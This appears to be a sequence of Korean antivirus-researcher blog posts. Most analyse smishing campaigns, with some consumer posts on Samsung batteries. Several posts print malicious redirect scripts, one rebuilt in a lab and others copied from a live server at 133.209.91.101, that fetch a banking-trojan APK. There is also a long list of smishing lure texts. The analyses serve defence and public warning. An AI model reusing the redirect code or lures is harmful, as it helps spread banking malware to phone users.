    var os = new Array("Android","iPhone","Windows Phone","iPod","BlackBerry","MeeGo","SymbianOS");  // 페儉잚謹돨盧땡꾸鱗溝固잚謹,菱契警속

var info = navigator.userAgent;

var len = os.length;

    for (var i = 0; i < len; i++) {

        if (info.indexOf(os[i]) > 0){

if (info.indexOf("Android") > 0){

return false; 

}

}

    }

    return true;

}


if(!is_pc())

{

document.location.href = "http://61.38.***.***:8080/mbn.apk";

}



※ 해당 코드들은 http://www.oschina.net/code/snippet_734122_19107 사이트에서 소개 하듯이 클라이언트가
PC인지 모바일인지 식별하는 코드를 조금 수정한 코드이다.
 



그리고 악성으로 테스트 하기에는 좀 그래서;;;

해당 코드를 이용하여 테스트랩을 구성하였더니, 모바일 단말기에 다운로드가 되는 것을 확인하였다.


또한 다운로드 된 안드로이드 어플리케이션 파일(APK)은 알약 안드로이드에서도 탐지가 가능하다.


※ 알약 안드로이드 탐지명 : Trojan.Android.SMS.Stech.Gen, Trojan.Android.KRBanker
 

 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



나를 괴롭히던 갤럭시 노트1의 이랜텍 스웰링(부풀음) 배터리를 드디어 해결 할 수 있을 듯 하다.

금일부터 삼성전자 서비스에서 갤럭시노트1,2에 한해 이랙텍 스웰링 배터리를 무상으로 교체해 준다는 공지사항이 올라왔다.


※ 2014년 4월 11일 추가 사항
이랜텍 배터리 3개 모두 정상적인 배터리로 교환 완료



나는 갤럭시S4 를 쓰고 있지만, 아직 와이프가 갤럭시 노트1을 사용중이고,
이랜텍 배터리 스웰링 현상으로 많은 스트레스를 받고 있었는데, 
이제 그 고민을 해결 해 줄 수 있어서 아주 기쁘다.

자신의 배터리가 이랜텍인지 확인하는 방법은 간단하다.
배터리 커버를 열고 이랜텍이라고 써있으면 보상을 받을 수 있다.

 

자세한 내용은 아래의 링크에서 확인 할 수 있다.

안녕하십니까!
 
삼성전자서비스에서 안내 말씀드립니다.
당사는 고객 편의를 위해 휴대폰 배터리의 보증기간을 지난 '13년 6개월에서 '14년 현재 12개월로 확대 운영중입니다.
최근 보증기간 이후 일부 휴대폰 모델의 이랜텍 배터리에서 스웰링(부풀음) 현상이 발생함에 따라 당사는 고객 만족은
물론 소비자 보호 차원에서 스웰링이 발생한 이랜텍 배터리를 대상으로 무상 교환 서비스를 확대 실시합니다.
 
제 조 사 : 이랜텍
대상 모델 : 갤럭시 노트1/노트2
교환 대상 : 이랜텍 배터리 중 스웰링(부풀음) 발생 건
교환 기간 : 2014년 3월11일부터 별도 공지 시 까지
※ 갤럭시S3 모델은 기존과 동일하게 실시함.

배터리 스웰링 현상은 배터리 수명말기에 발생하는 자연스러운 현상이며, 배터리 자체의 문제로 볼 수는 없으나,
고객 여러 분의 사용 편의를 위하여 이번에 스웰링이 발생한 이랜택 배터리에 한해 무상 교환 조치를 실시합니다.

삼성전자는 앞으로도 고객 여러 분께 불편을 드리는 일이 없도록 더 좋은 제품과 질 좋은 서비스로 보답하겠습니다.
 
감사합니다.


※ 가까운 삼성전자 서비스센터 알아보기
http://www.samsungsvc.co.kr/reserve/cenSearch.do?method=list

참고로 삼성전자 서비스센터의 영업시간은 아래와 같으니, 시간안에 가시길 ㅎㅎㅎ



한마디 더 하자면,
너네 말대로 배터리 스웰링 현상은 자연스러운 현상이다.
하지만 그 수명이라는건 누가 정하는건데? 난 구입한지 1년도 안되었는데 다른 스마트폰은 괜찮은데 이랜택것만 그렇다면??
당연히 무상으로 해줘야 하는거다!! 무상으로 해줘야하는거 생색내면서 주지말아라!!


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



인터넷에서 삼성 핸드폰의 정품 여부를 확인 할 수 있는 방법이 공유되어서 나도 한번 해보았다.
 

자신의 핸드폰이 삼성에서 만든 갤럭시 시리즈 라면 누구나 확인이 가능하다.
보통 중국이나 동남아에서 만든 짝퉁을 구분하는 방법이라고 하는데, 진실인지는 모르나 한번 해보자!!

방법은 간단하니, 아래와 같이 천천히 따라해보자.

1. 키패드에서 *#0*# 을 누른다.


2. HwModule Test 화면 중간에 Sensor 를 클릭한다.


3. Sensor로 접속 한 다음 손을 화면에 갖다대면 화면이 초록색으로 바뀌는지 확인한다.
   (요기까지는 중국도 가능하다고 함)
 

4. 왼쪽 상단 image test를 클릭한다.
 

5. 강아지 사진이 나오는지 확인한다. 





 




※ 테스트 해본 핸드폰은 갤럭시S, 갤럭시S3, 갤럭시S4, 갤럭시노트1, 갤럭시노트2, 갤럭시노트3 인데
갤럭시S 는 해당 방법으로는 HwModule Test 모드로 접근이 안되었다.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


스미싱으로 전파 된 녀석들 중에서 아주 친절하게 인터넷 뱅킹 은행사를 대신하여 "개인정보 강화서비스" 를 해준다고 한다 ㅎㅎ

해당 파일들의 특징은 리소스에 뱅킹앱의 이미지 파일을 담고 있는 것인데, 이것 또한 친절하게 써두었다.

※ 모든 그림에 들어간 문구는 "은행명"을 제외하곤 모두 동일하다.

"안녕하세요.

대한민국의 꿈과 희망을 키우는

우리나라 대표은행 OOOO 입니다.

항상 OOOO 은행을 이용해주시는

고객님들께 감사 드립니다.

OOOO 인터넷뱅킹 개인정보 강화서비스

OOOO 고객님만을 위한 개인정보 강화서비스

개인정보 유출로 인한 피해사례 때문에

고객님들의 개인자산 안전을 위하여

전면 개인정보 강화 제도를 실시하고

있습니다.

인터넷뱅킹 고객님들을 위한 OO은행

특별 개인정보 강화서비스 입니다.

이젠 안심하고 인터넷뱅킹을 

이용하세요." 


사용 된 은행은 "우리은행, 하나은행, KB국민은행, NH농협, 신한은행" 으로 총 5개의 은행을 대상으로 보여준다.

 

 




또한 파일 내부에는 사용설명서로 보이는 readme.txt 파일이 존재했다.



해당 내용을 번역하면 아래와 같다.



bank app을 조종하는 방법


1. 모니터링버전을 확인하고 어플리케이션을 업데이트한다. 


2. 우선 어플리케이션을 다운로드 하고, 그 후에 다시 지정한 어플을 삭제한다.(기능제거)


3. 모니터링 버전을 업데이트 한 후 지정된 bank app을 연다. 그 후 전송성공 후에 버전정보를 저장한다. 

Mark 현재 어플리케이션을 다음 정보들로 새로운 bankapp을 조종한다.

만약 제출이 성공하면, 현재 bankapp을 연다.

만약 전송성공하면 다음정보들이 


4. 업데이트 안내를 하는 아이콘을 현재 조종할 app의 아이콘으로 바꿔준다.


5. 안내창을 제거하고 알림창을 새로고침한다. Notification을 누르면 바로 지정한 app으로 바꾼다.



자나깨나 스미싱 조심하자!!

 

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



지속적으로 스마트폰 SMS에 대한 의험성에 대해서 이야기 드리고 있는데, 한번 당한 핸드폰번호에 대해서는 끊임없이
SMS가 발송 될 것입니다.




전달받는대로 빠르게 올려드릴테니, 해당 내용과 같은 SMS가  발송된다면 바로바로 삭제하시기 바랍니다.

이번에 받은 SMS 내용은 "소액결제,경찰청,전기요금,돌잔치,청접장,은행,택배,화재,연예인사생활,주차장,보안어플"을 위장한 
문자들이 많이 발견되고 있네요. 
 

※ 스미싱, 파밍, 피싱 문자 리스트

- [한국도로공사] OOO님의 차량이 무인단속장비에 적발 확인후 처리바랍니다
- [CJ대한통운]고객님게서 택배가도착하였습니다 확인해주십시요
- 12일 모임공지입니다. 망년회랑 같이하오니 꼭! 참석하세요
- ★카페베네★4주면 특별기프티콘! 아메리카노 (11월30일까지)바로받기
- 넥슨코리아.NeOTP 가 보안에 취약합니 주소에 연결 하셔서확인하세요
- [네이버뮤직]YB+박정현 콘서트"그해,겨울" 12.23~12.25응모 이벤트
- 롯데백화점 명품브랜드50%할인 영업시간 10시30분~20시(본점)
- 특히 Google엔진을 사용하여감사합니다 Google선물 한우500g 팩 받아가세요
- 지방경찰청입니다.출두해주세요 
- [마이크레딧]OOO님 신용정보변동 발생. 확인/수신거부 연결
- [신세계몰] 165000원 결제완료/익월요금합산 청구/내역확인
- -(주)현대캐피탈-본인인증절차
- 롯데홈쇼핑 모바일 전용주소 로그인 쿠/폰 선물 5만원
- [민원24] OOO님의 차량이 무인단속장비에 적발 확인후 처리바랍니다
- LGU KT 미환급요금조회 해 보기 -통신사 미환급금요금조회
- --EMS-- 우체국쇼핑주문완료 배송예정▶▶
- 고객님명의 가상계좌접수완료 본인인증 확인요청
- [응친] 친구맺기 요청이 도착하였습니다 확인하고 응답해주세요
- [Facebook] OOO님께서 그룹대화에 초대하였습니다
- [알리미]12/11 01:15 휴대폰본인인증 발생 [인증내역확인]
- [우체국]고객님게 택배가도착하였습니다 확인해주십시요
- 고객님!요금 과다청구 환급금 조회
- [건강보험공단]OOO님 무료종합검진 각 구청 홈페이지에서 확인 <바로가기>
- 36000원 선물권에 당첨되셨습니다.확인
- 항상이용해주심을 감사드립니다. 한잔후에는~ 늘이용하시던
- [민원24] OOO님의 차량이 무인단속장비에 적발 확인후 처리바랍니다
- 경찰서등기가 발송되었습니다.간편하게 등기조희가 가능합니다
- OOO 고객님 친구요청확인하기
- 11월 렌탈료50.000원 고객농협계좌 자동 입금처리되었습니다 {웅진코웨이}
- 하 하 ~ 옆밤 아줌마 섹스동영상 완전 대박
- [도로공사] 고객님 차량 단속대상 적발 확인후 빠른처리 요망
- 현대쇼핑주문완료 배송2~3일도착예정 배송조회▶ <우체국택배>
- [LG U ] 'LTE 다모아' 해지로 U Box 100GB 용량이 차감되었습니다.
- 11월 렌탈료50.000원 고객농협계좌 자동 입금처리되었습니다 {웅진코웨이}
- 12.11일 고객님 신한카드 22만원 정상결제완료되였읍니다.확인요망필요! 
- [SKT]T freemium 2만포인트로 B tv모바일 실시간방송까지
- [G마켓] 제이엔에.. 상품이 대한통운.. 로 발송되었습니다.
- 고객님이 원하시는 크리스마스커플 배송예정 [CJ대한통운 택배]
- 국민건강보험무료 암검진 대상이오니 꼭 암건진을 받으십시요
- OOO씨 13일 금요일 모임공지입니다. 망년회랑 같이하오니 꼭! 참석하세요
- [무료]휴대폰결제 안전하게 보호하세요. 스미싱방지캠페인
- 문화상품권이벤트 신청시10000원권상품권증정
- [CJ대한통운]택배가 반송(부재중)되었습니다. 주소지수정/재발송 요청
- 점수번호 122.135.117.184 번호클릭 병윈진단서 입니다 확인하시고 전화주세요
- [넥슨] 110000원 결제완료/익월요금합산 청구/잔액확인
- 보안 침해에 대 한 귀하의 휴대 전화 보호 파일을 설치
- 핸드폰 정도 유출가능성 있으니 보안시스템을 설치해 주세요
- 12월25일 전국 크리스마사 업데이트 인터넷 무료가입
- 인터넷+전화+TV 『현금』400.000만원 개통즉시입금▶▶
- 12.16일 신한카드 일시불 370.392원 정상결제완료. 확인요망!
- 무료종합건강검진.각 구청,읍,면,동사무소홈페이지에서확인.바로가기>
- 속보:10월8일이본에서 인천공으로 도착하는 HKU-9899 추락 내용
- 씨네폭스-10주년기념이벤트 국내최대편수 합법 인테넷영화관 굿다운로드, 스마트폰으로 실시간 무료영화감상 바로가기>>
- 북한, 장성택 체포 사진 공개…처형설도 나와 
- 인기배우들 사생활사진
- 【신용평가정보회】박진호의 주민등록번호가 해외 27건사용 확인☞
- 롯데홈쇼핑 모바일 전용주소 로그인 쿠/폰 선물 5만원. 
- 남자의자존심새로운생명매우 강한 최근드문 비아그라판매
- 아파트관리비 2개월 미납입니다, 납부독촉 통지서 
- 애인구함나이21살 몸매얼굴예쁘고성격부드럽고아래주소에사진및연락처있어욤
- merry Christmas 성탄절이벤 우리들만의 파티12월23일상세문의:
- 김대중 진실한 사망원인
- 마일리지15%적립12/22(튄)
- [LG]휴대폰인증 도용주의! 보호하시겠습니까?
- 병원 간호사 동영상 이올라왔다
- [삼성카드]:2013-12-23 09:05 카드 이용금액 330000원 확인☞
- 스파밸리★워터파크+불빛축제이용권특가/12월24일까지판매
- 소녀시대 18세이전 개인사진 다운
- 칠사공님알림 오직 사실만전합니다 로또리치 -578회 로또당첨번호알림
- 성탄절 우리동호회에서 열린 파티 많은참석 부탁드립니다. -김OO- 오시는길
- [☞☜][☞☜] (_/_/)(m)(m) 결혼식와주셔서정말감사합니다.
- 순정이모님[알약]무료체험주셔서정말감사합니다.
- [bitly] 55000원결제/익월요금합산청구/잔여한도 5000원
- [전자금융사기예방]신종사기의심파일확인,v3업데이트요망 
- ◇□"/성탄절□◇□◇폭탄주 ㅣ 양 -주ㅣ16만원 └ㅡㅡ퀄리티보장
- 남자 여자 친구만들기 남친 여친 문친 카카오톡채팅
- 카카오 채팅방 무조건 후불만남 바로가기 이벤트
- 농업경영인 2013년도 회비를입금 요망 농협 김OO: 회비:10만원
- [기프타콘엡] 고객님 주민번호 사용내역2건.ip추적성공. 사이렌24로 
- 이OO님께서 신년인사 카드를 보내셨습니다. 새해 복많이 받으세요
- 2014브라질월드컵 비행기티켓당첨[내용확인]
- 님!종합건강검진받으세요.[국민건강의료보험공단]통지서확인
- ▶신종 사기◀예방 [모바일 백신]※출시※http://han.gl/cyber 사이버테러대응센터
- 스보 스포츠 첫 가입시 5천 첫 입금시 10% 행운의 7가지 이벤!
- 저녁 8시/부자아빠무료방송/행복나눔특강! 설치 
- 도로교통법 위반사건 (2013형 제330-13220호 기소내용본문 
- 연말연시를 맞아 문자로나마 감사함을 표현합니다. 
- 아동촬영사에서 성탄대선물을 드립니다
- 저희 새해 1월1일(수) 결혼합니다. 많이많이 와서 축복해주세요
- 2013년 12월31일의 마지막날을 위한 저녁모임 같이 마무리.장소및참가인원
- 힘든한해 고생많으셨습니다.갑오년 새해에는 더욱 평안하시길 기원 합니다
- 내디스모바일 바로보기서비스 오픈기념이벤트 설치만해도 3만포인트지급
- 옥션무료 쿠폰 증정은 여기서 쏟아진다 
- 폰뱅킹 심상치않은 원인으로 거래제한 돼었습니다.본인확인후 거래제한푸세요
- 등기우편물이 고객님의부재중으로반송되었습니다 등기물정보확인하기
- [농협]2014/01/01 22:50 공인인증서 패기되였습니다 [발급/재발급]
- [정기모임] 자기계발에 꿈이 잇는 당신과의 행복한 동행을 기다립니다
- 14.01일 신한카드 일시불 26만원 정상처리완료. 확인요망!
- [CJ통운]우편물이 수취두절(부배중)상태입니다. 재발송/주소지확인
- [CJ통운]등기소포 수취두절(부재중)상태입니다.재방문/주소지변경확인
- [Epost] 우편물 수취두절[부재중]상태입니다. 재발송/주소확인
- 유재석 김병만 대상에 썩소사진 포착
- 수지 시상식 가슴노출 사진
- 2014년 공무원 봉급표 공개
- 박근혜 3분 야동 뮤료 동영상
- "OOO 오랜만이야 그동안 잘지냈어?" 동창찾기에서 초대되셨습니다
- 모바일2014신년이벤트당첨!무료메세지2014건설치사용☞
- 모바일2014신년이벤트당첨!무료롯도번호 2개 드림☞
- [스마트명세서]9월 결재하실 총금액213,400원(아래확인) 
- [단독]"몸에 넣은건데"..."동아제약"여성용품서 강한 암유발이물질
- 옆집 아줌마 완전 대박 동영상
- [(주)다날]68,000원 결제완료/일익월 요금합산 청구/확인
- [공지] 2014 신년 모임날짜 및 장소 확인하시고 필히 참석하세요
- 이승기 윤아의 연애설은 소속기획사와청와대의45억대조작이었다 . 바로가기
- [금감원]카드사 개인정보유출사고발생 OOO님 사용내역확인후 2차 피해예방 하세요
- 조용희~보세요~~** 기항후하지원19금영상~ 
- [신형독감]독감예방 주의알림 각지방병원에서 무료건감검진을 알림
- facebook 친구 요청 되었습니다
- [사이버경찰청]OOO님!출석요구서발송완료사건조회후출석일시확인
- S-COP베타버전!대한민국 유일의 악성앱100%차단!
- 2014 민방위 훈련 통지서입니다 훈련, 교육일정 확인
- 민방위 훈련 통지드립니다 2014 교육,훈련일정 확인요망 
- [고객님] 이동전화 미환급금 정보조회하세요 
- 새해대박찬스1시간!!이벤트(선착순)참여시 삼!만!마일리지 즉시지급
- [G마켓] HP800G1 AIO 30주년 더더더페스티벌 경품 지금 응모하세요!!
- [G마켓]청마년 딱1시간 이벤트 (선착순)참여시 3!만!마일리지 지급
- [G마켓]새해!선물이벤트! 핸드폰인증시 3만!마일리지 즉시지급 
- OOO님!갤럭시 s5 출시!! 구매 예약시 12 GB 데이터 드립니다
- 콘도 무료이용권에 당첨되셧습니다
- [KBInfo플러스]OOO님의 신용정보변동내역발생.확인
- 2013년 신용카드 소득공제용 사용내역 입니다 
- [KB카드WiseInfo플러스]OOO님의 신용정보변동내역발생.홈페이지확인
- 무료야동/국내최초 앱에서 사용가능 지금 바로 설치 
- 우체국 택배와 등기의 차이점
- 신한카드 만원정상처리완료.본안아닐경우확인요망!
- 류시원와9살연하신부10월7일 12시 아이웨딩홀 결혼합니다 축하해주세요
- [남부지방법원]출석요구서 1/16발송완료 사건조회후 출석일시확인
- OOO님!종합건강검진받으세요국민건강의료보험공단통지서확인
- 서울지방검찰청 금융거래 정보등의 제공사실 통보서 간편조회
- 2014년 예비군 비상소집훈련 통지서입니다 새로 변경된 일정 필히 확인하세요
- sbs특종~!북한 대통령 김정은 사망
- 카드사 정보유출 KB,롯데,농협카드 홈페이지서 유출정보 확인가능
- 올 한 해 소망하시는 모든 일에서 풍성한 결실 맺으시길 기원합니다 꼭 보세요
- 회원가입 축하합니다 무료별소리 10회 다운로드 가능
- 금감원 개인정보 유출조회확인과정 개인정보 또다시 유출돼.. SBS 조정 기자입니다
- 갑오년 새해, 가정에 웃음과 기쁨이 가득하길 바랍니다 꼭 보세요
- {농협} 스미싱강화 업데이트 됐습니다 링크 앱주소
- 2014년민방위비상소집훈련통지서입니다새로변경된일정필히확인하세요
- (부고) 금일 저희 부친께서 별세 하셨습니다
- 카드사 정보유출 KB,롯데,농협카드 홈페이지서 유출정보 확인가능
- 2014년 구정맞이 부모님 선물셋트 50% 대할인 이벤트 마지막 3일남았습니다 
- [마이크레딧]지연님신용정보변동발생.확인/수신거부연결
- 입금하신금액을포인트로충전했습니다.본인확인요망!
- 대박웃김 꼭보세요
- 대형마트도 반한 '병행수입' 얼마나 싸길래 
- 개인정보 불법유통 징역 5년..신고포상 1천만원
- 2014년★ 스타벅스 ★ 신년 청마 선물세트 - 쿠폰번호 - 바로확인
- 명일 설 선물셋트 배송 예정이오니 물품확인하시고 수령가능한시간 남겨주세요
- 주문하신 나이 한살이 배송 중입니다
- 『경찰청웹메일』출석요구서발송완료 사건조회후출석 일시확인
- [대검찰청] 출석요구서(발송완료)사건조회후출석일시확인~
 
※ 단축 URL은 위험요소가 있기에, 모두 삭제하였음!! 


 



※ 현재 스마트폰 사기에 관련 된 SMS에 대해 신고 받고 있습니다.

신고 방법은 간단하오니, 아래의 방법으로 해주시면 감사하겠습니다.


1. 알약 모바일을 설치한다. 설치는 구글플레이 정식 마켓에서 설치하면 된다.
알약 안드로이드 설치사이트: https://play.google.com/store/apps/details?id=com.estsoft.alyac


2. 알약 안드로이드의 "스미싱 감시하기" 를 On으로 설정한다.



3. 스미싱문자가 도착하면 알약 안드로이드에서 "스미싱 의심 메시지"로 분류되어, 판단이유는 하단에 표기된다.
이때 최하단 "신고하기" 버튼을 클릭하여 신고를 하면 된다.


또는 알약 안드로이드 메인화면에서 "스팸관리" 메뉴를 클릭하면 차단 된 스미싱 메시지를 확인 할 수 있다. 
이곳에서도 신고를 할 수 있다.

     
  

      
  

 
4. 신고가 된 메시지는 알약 안드로이드 분석팀에서 분석 후, 
업데이트가 완료 되면 아래와 같이 "스미싱 의심 메시지"가 "위험 메시지"로 수정 된다.

      
  


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


현재까지 모든 스미싱 문자 메시지는 하나의 URL을 사용해왔다.

하지만 이번에 발견 된 스미싱 문자 메시지는 사용자를 더 완벽하게 속이기 위하여 이중으로 URL을 보내는 것으로 보인다.

자세한 내용은 아래에서 설명하겠다.

아래의 내용은 실제 스미싱 문자를 수신 받은 내용이다.

조용희~보세요~~** https://be**.*** 기항후하지원19금영상~ Wudi0123.*****.net
※ 아직 유포 중인 URL이라 일부 수정

 


※ 현재 알약 안드로이드에서는 해당 스미싱 문자를 구분하고 있으므로,
알약 안드로이드 사용자들은 스미싱 옵션을 "On"으로 켜두기 바람 (사실 계속 On으로 켜둬야 맞는거임 ㅡ.ㅡ;;)


위의 내용을 보면 URL이 2개가 표기되어 있는 것을 알 수 있다.

첫번재 URL - "조용희~보세요~~** https://be**.***" : 해당 URL은 성인사이트를 나타내고 있다.
두번째 URL - "기항후하지원19금영상~ Wudi0123.*****.net" : 해당 URL은 실제 악성 APK를 다운로드 받는 사이트로 연결

스미싱 제작자들은 사용자들이 처음 성인사이트를 눌러보고 문자메시지에 대한 신뢰감이 높으면 두번째 URL도
누를 것이라는 예상
을 하는 듯 하다.

나라도 첫번째 성인사이트를 믿고, 실제 MBC드라마 기황후의 주인공인 하지원의 19금 영상이라고 생각 하여 두번째 URL도
누를 수도 있겠다 싶다.

아래의 그림은 첫번째 URL에서 보여지는 성인사이트와 두번째 URL에서 다운로드 되는 APK 내용에 대한 그림이다.

  

(노모자이크로 보여드리고 싶은 맘은 굴뚝같으나....ㅠ.ㅠ 그나마 얼굴은 모자이크 안함 ㅋㅋㅋㅋㅋㅋㅋ)
 




다운받은 "data.apk" 파일은 알약 안드로이드에서 "Trojan.Android.KRBanker.Gen" 으로 탐지 되고 있으니, 걱정하지 마시길^^


※ 이번 스미싱 메시지는 조선족이 보냈나? 조용희(조용히), 기항후(기황후) 단어 사용이;;


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


이전 스미싱 제작자가 자신들의 파일이 모바일 단말기가 아닌 데스크탑 OS에서 다운로드 되는 것을 눈치채어
User Agent를 파악하여 다운로드 시키는 방식을 소개 한 적이 있다.


이전에는 사용자의 User Agent로 를 판단하여 리다이렉션 시켰는데, 이번에는 쿠키를 이용하여 리다이렉션을 시키는 사례가 
발견되어 간단하게 적어본다.

또한 어떻게 사용자를 기만하는지 한번 알아보자.
 

발견 된 스미싱 문자의 URL은 "133.209.91.101" 이다.
(※ 현재는 서버가 종료되었으므로 전체 URL을 공개)
 

 

우선 기본적인 User Agent로 접속을 시도해보았다. 
사용 된 
User Agent 는 Mozilla/7.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.2) Gecko/20010726 Netscape/7.0 이다.

아래의 그림과 같이 지마켓 사이트인 "http://www.gmarket.co.kr" URL로 리다이렉션 되었다.




그럼 다시 모바일 User Agent로 접속을 시도해보았다. 

사용 된 User Agent 는 Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebkit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 이다.

그럼 아래와 같이 실제 스미싱 서버로 접속이 가능하다.


실제 접속 된 사이트의 내용은 아래와 같다.

※ 접속 된 서버 내용

<script runat=server>

var key1 = '01031349899';

document.cookie = 'key1=' + key1;

location.href = 'h' + 't' + 'tp://' + '133.209.91.101/' + 'do' + 'wn' + '.' + 'a' + 'sp' // 133.209.91.101/down.asp 로 접속

</script>



그럼 이제 새롭게 나온 "133.209.91.101/down.asp" URL로 접속을 해보자.
물론 User Agent는 모바일용으로 접속했다.

하지만, 처음과 마찬가지로 지마켓 사이트인 "http://www.gmarket.co.kr" URL로 리다이렉션 되었다.




그 이유는 아래의 그림에 존재했다.
바로 쿠키(Cookie)를 지정해주어야 관련 URL로 접속이 가능했던 것이다.

첫번째, 쿠키값은 var key1 = '01031349899' 였다.




그럼 이제 첫번째 쿠키값인 var key1 = '01031349899' 로 "133.209.91.101/down.asp" URL로 접속을 시도해보았다.
다시 실제 서버였던 내용이 보여진다. 



실제 접속 된 사이트의 내용은 아래와 같다.

※ 접속 된 서버 내용

<script runat=server>

var key2 ='01039515445';

document.cookie = 'key2=' + key2;

location.href = 'ht' + 'tp://133.209.91.101/Ap' + 'p' + '.ap' + 'k' // 133.209.91.101/App.apk 로 접속

</script>



마지막으로 133.209.91.101/App.apk 파일을 받기 위해서는 두번째 쿠키값인 var key2 ='01039515445' 을 입력해야만
APK 파일을 다운로드 
받을 수 있었다. 




해당 파일은 알약 안드로이드 에서 "Trojan.Android.KRBanker" 로 탐지 된다.



추가적으로 해당 서버는 일본에 존재했던 서버로 확인되었다.


IP Address : 133.209.91.101 

inetnum : 133.0.0.0 - 133.255.255.255  

Country : JAPAN 

Country Code : JP 

CITY : TOKYO 

REGION : TOKYO 

ISP : JAPAN NETWORK INFORMATION CENTER 

DOMAIN : BIGRIVERWIRELESS.NET 

DomainTools :  Verification 
 



이전에도 이야기했지만, 스미싱 배포 환경에 따라 
     보안업체 또는 스미싱 어플리케이션을 수집하는 시스템
            지속적으로 발전해야 스미싱 어플리케이션 파일을 수집할 수 있다.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.